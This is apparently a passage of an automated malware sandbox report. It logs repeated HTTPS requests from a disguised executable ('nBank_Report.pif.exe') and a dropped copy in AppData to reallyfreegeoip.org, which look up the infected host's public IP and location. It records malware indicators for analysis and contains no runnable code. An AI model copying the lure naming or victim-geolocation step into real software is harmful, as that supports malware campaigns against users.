                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.1049715188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:29 UTC683INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:29 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8041
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W6Ya8toiopebTpYmGYEXb6vm5ctTR%2FYnpFMuyf0l%2FhCZM3XR%2BPcwlUr%2BXblZmUDp2lrRJf4d0ijMGHFwn6woxBddE1Uoib0agmzTHmqQy%2BA%2FgHu5cqLvC7VGNU%2BlgRqlNRqS7a2s"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240b25ee141f8-EWR
                                              2024-09-26 09:33:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.1049717188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:30 UTC677INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:30 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8042
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0s82nWBcXUtg3X39J0v67CfM%2FamJiH4eSBsyE5clzOgzETuClq6xS3YAPXXqYqJotYhzKFY%2BZjxl3C%2B7oznoxKqd0Mclx61p970NMQCcAC8Kk%2BNlUnMv89X60pz6nvEVE4Z1ZjZ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240b85f59726f-EWR
                                              2024-09-26 09:33:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.1049718188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:30 UTC675INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:30 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8042
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BH7eIWWmF2qCkEvcakwMlSiBkPrJC9d3emrWohkGBwJTUitjYditNbjLwj8%2BBUJAuhUxEfzHdCSf64aGzCLhejn5SgsIGR86QpW9efpv1NwiHA%2FZo3hyIVOYzmINCYn7GX2dueN"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240babfd632e8-EWR
                                              2024-09-26 09:33:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.1049719188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:31 UTC681INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:31 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8043
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAdBvyn3rSaEp3iUH%2B74Anlu3UWJVEW7IxM8t15Xrbdfs%2BQmzoDqLNEiP%2FdEkW3zVcpRkpzcmsJgdvrAoT0R%2BDFfJ%2BZozVx%2Fwm3ZfsRrbSMjpTiydw7WrSD3M6EBRI9puo4YYtw6"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240bd9b7472aa-EWR
                                              2024-09-26 09:33:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.1049722188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:32 UTC675INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:31 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8043
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69T7Y5b9Mm2mnhCCpAYbLLTKgSvqLbqAHG5wk4Do4z4gFc6qcQYzjSj%2FyQKI9mRjj%2Fr3Mp2ZxMBsegrSyHpQu%2BG6PSqAaTcosfIwggWUxYpbz7yc2cpt74jQo15y00oueIayjQ6V"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240c2ed238cbf-EWR
                                              2024-09-26 09:33:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.1049723188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:32 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:32 UTC679INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:32 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8044
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjwhRXqjHsmCt89vg99lbmgoRa3PJcKXCm7HFRn3K%2Bezz8ScT0wld14hrZ%2BHNCJmKiB13i4F1OF1oYhr0G5C%2BHOm1JQGM4J2DQD3VW2NbzE7TBcYiLV0ekSxmUZ47LKppwx%2F%2FTYC"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240c5bd600f7c-EWR
                                              2024-09-26 09:33:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.1049726188.114.96.34433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:33 UTC701INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:33 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8045
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I50EKRF%2FkGUrw42mFfreZRQQ9CubSh2bZ2IKytGrVUwWuATVAJVon6BZHGdu63J6RgujnXpxnsi1kWGBq9qfNQzxdEZA43fu7cjEKsutodN4JuIHt6HNPn2kNVIJcerw3fGG0pPH"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240cb0b708ce0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-09-26 09:33:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.1049728188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:33 UTC677INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:33 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8045
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8L1PIa8yL6eAM5b%2F8wWOYIrtuPAau9K%2FUTJY99X8WAek94gili1Sc0B%2BnO9WuGE9umB7igqockYM3rQ2ytxIICV6u9taDPWiZa2d1k5zWR5M3CPRUJb9K0kK1SV%2FApCGuJZpNaNw"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240cddbee4237-EWR
                                              2024-09-26 09:33:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.1049731188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:35 UTC677INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:35 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8047
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FB0pIat9hj%2FHIKGtv9a9BfkoENiU7sv1rbfwX%2Fn7B9%2Fp8loLV49RfU6Y9nDKOr21NbJMPbvAdKf1GTevu7d2u5EEw2kbQjVB3g3HwezuQscaB6IHafm7lRcrqlF9FJxvV78%2FZey2"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240d5dee243b3-EWR
                                              2024-09-26 09:33:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.1049735188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:36 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 09:33:36 UTC671INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:36 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8048
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7q5LvNplzZrf7W1N3zclU80BnxB7GaXkdsCk7MryqE3fn5Ycd91mmyGgl4ysYX2QdqnamfUnUg7SjRLXWI8CjeZqZteUUyr7Jo7mV8Qn6MNBfvNp0iFWn0Ga%2B1NIZzaxkl4As68"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240ddeae8c461-EWR
                                              2024-09-26 09:33:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
